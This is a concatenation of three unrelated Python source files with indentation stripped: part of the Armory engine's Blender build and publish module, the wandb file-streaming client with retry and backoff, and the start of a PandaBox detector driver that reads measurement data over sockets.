shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_hscript == 'Enabled':
modules.append('hscript')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs)
# elif ref.startswith('grease_pencil'):
# compile_shader_pass(res, raw_shaders_path, ref, [])
else:
compile_shader_pass(res, raw_shaders_path, ref, defs)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, state.is_viewport, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_viewport, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() and not state.is_viewport:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'ios' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/fxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/pt_raygeneration.o', '-T', 'lib_6_1', fp + '/HlslShaders/pt_raygeneration.hlsl'])
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/pt_closesthit.o', '-T', 'lib_6_1', fp + '/HlslShaders/pt_closesthit.hlsl'])
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/pt_miss.o', '-T', 'lib_6_1', fp + '/HlslShaders/pt_miss.hlsl'])
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_viewport and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
else:
cmd.append(arm.utils.build_dir())
if assets_only:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, build_done)
def build_viewport():
if state.proc_build != None:
return
if not arm.utils.check_saved(None):
return
if not arm.utils.check_sdkpath(None):
return
arm.utils.check_default_props()
assets.invalidate_enabled = False
play(is_viewport=True)
assets.invalidate_enabled = True
def build(target, is_play=False, is_publish=False, is_viewport=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_viewport = is_viewport
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def runtime_to_target(is_viewport):
wrd = bpy.data.worlds['Arm']
if is_viewport or wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(is_viewport, target):
if is_viewport:
return arm.utils.build_dir() + '/krom/krom.js'
elif target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play(is_viewport):
global scripts_mtime
global code_parsed
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(is_viewport), is_play=True, is_viewport=is_viewport)
khajs_path = get_khajs_path(is_viewport, state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target or \
state.last_is_viewport != state.is_viewport:
wrd.arm_recompile = True
state.last_target = state.target
state.last_is_viewport = state.is_viewport
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
cmd.append('--sound')
elif arm.utils.get_os() == 'mac' or arm.utils.get_os() == 'linux': # TODO: Wait for new Krom audio
pass
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Clean up
mapfile = files_path + '/krom.js.temp.map'
if os.path.exists(mapfile):
os.remove(mapfile)
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
os.rename(files_path + '/Krom.exe', files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.exe')
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
os.rename(files_path + '/Krom', files_path + '/' + arm.utils.safestr(wrd.arm_project_name))
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
os.rename(files_path + '/Krom.app', files_path + '/' + arm.utils.safestr(wrd.arm_project_name) + '.app')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
print('Project cleaned')
|
file_stream.py
|
import base64
import binascii
import collections
import itertools
import logging
import os
import sys
import random
import requests
import threading
import time
import wandb
from wandb import util
from wandb import env
import six
from six.moves import queue
from ..lib import file_stream_utils
logger = logging.getLogger(__name__)
Chunk = collections.namedtuple("Chunk", ("filename", "data"))
class DefaultFilePolicy(object):
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
chunk_id = self._chunk_id
self._chunk_id += len(chunks)
return {"offset": chunk_id, "content": [c.data for c in chunks]}
class JsonlFilePolicy(DefaultFilePolicy):
def process_chunks(self, chunks):
chunk_id = self._chunk_id
# TODO: chunk_id is getting reset on each request...
self._chunk_id += len(chunks)
chunk_data = []
for chunk in chunks:
if len(chunk.data) > util.MAX_LINE_SIZE:
msg = "Metric data exceeds maximum size of {} ({})".format(
util.to_human_size(util.MAX_LINE_SIZE),
util.to_human_size(len(chunk.data)),
)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
else:
chunk_data.append(chunk.data)
return {
"offset": chunk_id,
"content": chunk_data,
}
class SummaryFilePolicy(DefaultFilePolicy):
def process_chunks(self, chunks):
data = chunks[-1].data
if len(data) > util.MAX_LINE_SIZE:
msg = "Summary data exceeds maximum size of {}. Dropping it.".format(
util.to_human_size(util.MAX_LINE_SIZE)
)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
return False
return {"offset": 0, "content": [data]}
class CRDedupeFilePolicy(DefaultFilePolicy):
"""File stream policy that removes characters that would be erased by
carriage returns.
This is what a terminal does. We use it for console output to reduce the
amount of data we need to send over the network (eg. for progress bars),
while preserving the output's appearance in the web app.
"""
def __init__(self, start_chunk_id=0):
super(CRDedupeFilePolicy, self).__init__(start_chunk_id=start_chunk_id)
self._prev_chunk = None
def process_chunks(self, chunks):
ret = []
flag = bool(self._prev_chunk)
chunk_id = self._chunk_id
for c in chunks:
# Line has two possible formats:
# 1) "2020-08-25T20:38:36.895321 this is my line of text"
# 2) "ERROR 2020-08-25T20:38:36.895321 this is my line of text"
prefix = ""
token, rest = c.data.split(" ", 1)
is_err = False
if token == "ERROR":
is_err = True
prefix += token + " "
token, rest = rest.split(" ", 1)
prefix += token + " "
lines = rest.split(os.linesep)
for line in lines:
if line.startswith("\r"):
found = False
for i in range(len(ret) - 1, -1, -1):
if ret[i].startswith("ERROR ") == is_err:
ret[i] = prefix + line[1:] + "\n"
found = True
break
if not found:
if flag:
flag = False
prev_ret = self._prev_chunk["content"]
for i in range(len(prev_ret) - 1, -1, -1):
if prev_ret[i].startswith("ERROR ") == is_err:
prev_ret[i] = prefix + line[1:] + "\n"
found = True
break
if found:
chunk_id = self._prev_chunk["offset"]
ret = prev_ret + ret
else:
ret.append(prefix + line[1:] + "\n")
else:
ret.append(prefix + line[1:] + "\n")
elif line:
ret.append(prefix + line + "\n")
self._chunk_id = chunk_id + len(ret)
ret = {"offset": chunk_id, "content": ret}
self._prev_chunk = ret
return ret
class BinaryFilePolicy(DefaultFilePolicy):
def process_chunks(self, chunks):
data = b"".join([c.data for c in chunks])
enc = base64.b64encode(data).decode("ascii")
offset = self._offset
self._offset += len(data)
return {"offset": self._offset, "content": enc, "encoding": "base64"}
class FileStreamApi(object):
"""Pushes chunks of files to our streaming endpoint.
This class is used as a singleton. It has a thread that serializes access to
the streaming endpoint and performs rate-limiting and batching.
TODO: Differentiate between binary/text encoding.
"""
Finish = collections.namedtuple("Finish", ("exitcode"))
Preempting = collections.namedtuple("Preempting", ())
PushSuccess = collections.namedtuple("PushSuccess", ("artifact_id", "save_name"))
HTTP_TIMEOUT = env.get_http_timeout(10)
MAX_ITEMS_PER_PUSH = 10000
def __init__(self, api, run_id, start_time, settings=None):
if settings is None:
settings = dict()
# NOTE: exc_info is set in thread_except_body context and readable by calling threads
self._exc_info = None
self._settings = settings
self._api = api
self._run_id = run_id
self._start_time = start_time
self._client = requests.Session()
self._client.auth = ("api", api.api_key)
self._client.timeout = self.HTTP_TIMEOUT
self._client.headers.update(
{
"User-Agent": api.user_agent,
"X-WANDB-USERNAME": env.get_username(),
"X-WANDB-USER-EMAIL": env.get_user_email(),
}
)
self._file_policies = {}
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_except_body)
# It seems we need to make this a daemon thread to get sync.py's atexit handler to run, which
# cleans this thread up.
self._thread.name = "FileStreamThread"
self._thread.daemon = True
self._init_endpoint()
def _init_endpoint(self):
settings = self._api.settings()
settings.update(self._settings)
self._endpoint = "{base}/files/{entity}/{project}/{run}/file_stream".format(
base=settings["base_url"],
entity=settings["entity"],
project=settings["project"],
run=self._run_id,
)
def start(self):
self._init_endpoint()
self._thread.start()
def set_default_file_policy(self, filename, file_policy):
"""Set an upload policy for a file unless one has already been set.
"""
if filename not in self._file_policies:
self._file_policies[filename] = file_policy
def set_file_policy(self, filename, file_policy):
self._file_policies[filename] = file_policy
@property
def heartbeat_seconds(self):
# Defaults to 30
return self._api.dynamic_settings["heartbeat_seconds"]
def rate_limit_seconds(self):
run_time = time.time() - self._start_time
if run_time < 60:
return max(1, self.heartbeat_seconds / 15)
elif run_time < 300:
return max(2.5, self.heartbeat_seconds / 3)
else:
return max(5, self.heartbeat_seconds)
def _read_queue(self):
# called from the push thread (_thread_body), this does an initial read
# that'll block for up to rate_limit_seconds. Then it tries to read
# as much out of the queue as it can. We do this because the http post
# to the server happens within _thread_body, and can take longer than
# our rate limit. So next time we get a chance to read the queue we want
# read all the stuff that queue'd up since last time.
#
# If we have more than MAX_ITEMS_PER_PUSH in the queue then the push thread
# will get behind and data will buffer up in the queue.
return util.read_many_from_queue(
self._queue, self.MAX_ITEMS_PER_PUSH, self.rate_limit_seconds()
)
def _thread_body(self):
posted_data_time = time.time()
posted_anything_time = time.time()
ready_chunks = []
uploaded = set()
finished = None
while finished is None:
items = self._read_queue()
for item in items:
if isinstance(item, self.Finish):
finished = item
elif isinstance(item, self.Preempting):
request_with_retry(
self._client.post,
self._endpoint,
json={
"complete": False,
"preempting": True,
"uploaded": list(uploaded),
},
)
uploaded = set()
elif isinstance(item, self.PushSuccess):
uploaded.add(item.save_name)
else:
# item is Chunk
ready_chunks.append(item)
cur_time = time.time()
if ready_chunks and (
finished or cur_time - posted_data_time > self.rate_limit_seconds()
):
posted_data_time = cur_time
posted_anything_time = cur_time
self._send(ready_chunks)
ready_chunks = []
if cur_time - posted_anything_time > self.heartbeat_seconds:
posted_anything_time = cur_time
self._handle_response(
request_with_retry(
self._client.post,
self._endpoint,
json={
"complete": False,
"failed": False,
"uploaded": list(uploaded),
},
)
)
uploaded = set()
# post the final close message. (item is self.Finish instance now)
request_with_retry(
self._client.post,
self._endpoint,
json={
"complete": True,
"exitcode": int(finished.exitcode),
"uploaded": list(uploaded),
},
)
def _thread_except_body(self):
# TODO: Consolidate with internal_util.ExceptionThread
try:
self._thread_body()
except Exception as e:
exc_info = sys.exc_info()
self._exc_info = exc_info
logger.exception("generic exception in filestream thread")
util.sentry_exc(exc_info, delay=True)
raise e
def _handle_response(self, response):
"""Logs dropped chunks and updates dynamic settings"""
if isinstance(response, Exception):
wandb.termerror("Droppped streaming file chunk (see wandb/debug.log)")
logging.error("dropped chunk %s" % response)
raise response
else:
parsed: dict = None
try:
parsed = response.json()
except Exception:
pass
if isinstance(parsed, dict):
limits = parsed.get("limits")
if isinstance(limits, dict):
self._api.dynamic_settings.update(limits)
def _send(self, chunks):
# create files dict. dict of <filename: chunks> pairs where chunks is a list of
# [chunk_id, chunk_data] tuples (as lists since this will be json).
files = {}
# Groupby needs group keys to be consecutive, so sort first.
chunks.sort(key=lambda c: c.filename)
for filename, file_chunks in itertools.groupby(chunks, lambda c: c.filename):
file_chunks = list(file_chunks) # groupby returns iterator
# Specific file policies are set by internal/sender.py
self.set_default_file_policy(filename, DefaultFilePolicy())
files[filename] = self._file_policies[filename].process_chunks(file_chunks)
if not files[filename]:
del files[filename]
for fs in file_stream_utils.split_files(files, max_mb=10):
self._handle_response(
request_with_retry(
self._client.post,
self._endpoint,
json={"files": fs},
retry_callback=self._api.retry_callback,
)
)
def stream_file(self, path):
name = path.split("/")[-1]
with open(path) as f:
self._send([Chunk(name, line) for line in f])
def enqueue_preempting(self):
self._queue.put(self.Preempting())
def push(self, filename, data):
"""Push a chunk of a file to the streaming endpoint.
Arguments:
filename: Name of file that this is a chunk of.
chunk_id: TODO: change to 'offset'
chunk: File data.
"""
self._queue.put(Chunk(filename, data))
def push_success(self, artifact_id, save_name):
"""Notification that a file upload has been successfully completed
Arguments:
artifact_id: ID of artifact
save_name: saved name of the uploaded file
"""
self._queue.put(self.PushSuccess(artifact_id, save_name))
def finish(self, exitcode):
"""Cleans up.
Anything pushed after finish will be dropped.
Arguments:
exitcode: The exitcode of the watched process.
"""
self._queue.put(self.Finish(exitcode))
# TODO(jhr): join on a thread which exited with an exception is a noop, clean up this path
self._thread.join()
if self._exc_info:
logger.error("FileStream exception", exc_info=self._exc_info)
# reraising the original exception, will get recaught in internal.py for the sender thread
six.reraise(*self._exc_info)
MAX_SLEEP_SECONDS = 60 * 5
def request_with_retry(func, *args, **kwargs):
"""Perform a requests http call, retrying with exponential backoff.
Arguments:
func: An http-requesting function to call, like requests.post
max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk
*args: passed through to func
**kwargs: passed through to func
"""
max_retries = kwargs.pop("max_retries", 30)
retry_callback = kwargs.pop("retry_callback", None)
sleep = 2
retry_count = 0
while True:
try:
response = func(*args, **kwargs)
response.raise_for_status()
return response
except (
requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout,
) as e:
if isinstance(e, requests.exceptions.HTTPError):
# Non-retriable HTTP errors.
#
# We retry 500s just to be cautious, and because the back end
# returns them when there are infrastructure issues. If retrying
# some request winds up being problematic, we'll change the
# back end to indicate that it shouldn't be retried.
if e.response is not None and e.response.status_code in {
400,
403,
404,
409,
}:
return e
if retry_count == max_retries:
return e
retry_count += 1
delay = sleep + random.random() * 0.25 * sleep
if isinstance(e, requests.exceptions.HTTPError) and (
e.response is not None and e.response.status_code == 429
):
err_str = "Filestream rate limit exceeded, retrying in {} seconds".format(
delay
)
if retry_callback:
retry_callback(e.response.status_code, err_str)
logger.info(err_str)
else:
pass
logger.warning(
"requests_with_retry encountered retryable exception: %s. func: %s, args: %s, kwargs: %s",
e,
func,
args,
kwargs,
)
time.sleep(delay)
sleep *= 2
if sleep > MAX_SLEEP_SECONDS:
sleep = MAX_SLEEP_SECONDS
except requests.exceptions.RequestException as e:
error_message = "unknown error"
try:
error_message = response.json()["error"] # XXX clean this up
except Exception:
pass
logger.error("requests_with_retry error: {}".format(error_message))
logger.exception(
"requests_with_retry encountered unretryable exception: %s", e
)
return e
|
PandaBox.py
|
from .Detector import Detector, TriggeredDetector, BurstDetector
from ..environment import env
import time
import numpy as np
import socket
from threading import Thread
import select
SOCK_RECV = 4096
RECV_DELAY = 1e-4
class PandaBox(Detector, TriggeredDetector, BurstDetector):
"""
Basic class for treating a PandaBox as a detector, capable
of operating in burst mode (thereby acting as a time-based
trigger source).
The PandaBox is infinitely configurable, and this class assumes that:
#. the PCAP block is used,
#. the PULSE1 block is used to control the number of
acquired points and their timing, and
#. flickering the "A" bit causes a trigger.
"""
def __init__(self, name=None, host='172.16.126.101',
ctrl_port=8888, data_port=8889, bitblock='BITS1'):
self.host = host
self.ctrl_port = ctrl_port
self.data_port = data_port
self.acqthread = None
self.burst_latency = .003
self.bitblock = bitblock
Detector.__init__(self, name=name)
TriggeredDetector.__init__(self)
BurstDetector.__init__(self)
def initialize(self):
self.ctrl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ctrl_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
self.ctrl_sock.settimeout(1)
self.ctrl_sock.connect((self.host, self.ctrl_port))
def query(self, cmd):
self.ctrl_sock.sendall(bytes(cmd + '\n', 'ascii'))
return self.ctrl_sock.recv(SOCK_RECV).decode()
def busy(self):
if self.acqthread and self.acqthread.is_alive():
return True
else:
return False
def prepare(self, acqtime, dataid, n_starts):
BurstDetector.prepare(self, acqtime, dataid, n_starts)
self.query('PULSE1.PULSES=%d' % self.burst_n)
self.query('PULSE1.WIDTH=%f' % self.acqtime)
self.query('PULSE1.STEP=%f' % (self.burst_latency + self.acqtime))
def arm(self):
self.acqthread = Thread(target=self._acquire)
self.acqthread.start()
self.query('*PCAP.ARM=')
done = False
while not done:
ret = self.query('*PCAP.COMPLETION?')
if 'Busy' in ret:
done = True
time.sleep(.005)
time.sleep(.05) # necessary hack
def _acquire(self):
"""
Receive and parse one set of measurements.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.data_port))
s.send(b'\n\n')
# First wait for the header to be complete, and parse it.
done = False
buff = b''
while not done:
buff += s.recv(SOCK_RECV)
if b'\n\n' in buff:
done = True
header, buff = buff.split(b'\n\n')
channels = []
for line in header.split(b'fields:\n')[-1].split(b'\n'):
ch = line.strip().split()[0].decode()
op = line.strip().split()[2].decode()
channels.append(ch + '_' + op)
# Then put the rest of the data into the same buffer and continue
n = 0
data = {ch: [] for ch in channels}
num_points = self.hw_trig_n * self.burst_n
while n < num_points:
# anything more to read?
ready = select.select([s], [], [], RECV_DELAY)[0]
if ready:
buff += s.recv(SOCK_RECV)
# anything more to parse?
if b'\n' in buff:
line, buff = buff.split(b'\n', 1)
vals = line.strip().split()
for k, v in zip(channels, vals):
if b'END' in v:
data[k].append(None)
n = num_points
break
data[k].append(float(v))
n += 1
for k, v in data.items():
data[k] = np.array(v)
self.data = data
self.query('*PCAP.DISARM=')
def start(self):
if not self.hw_trig:
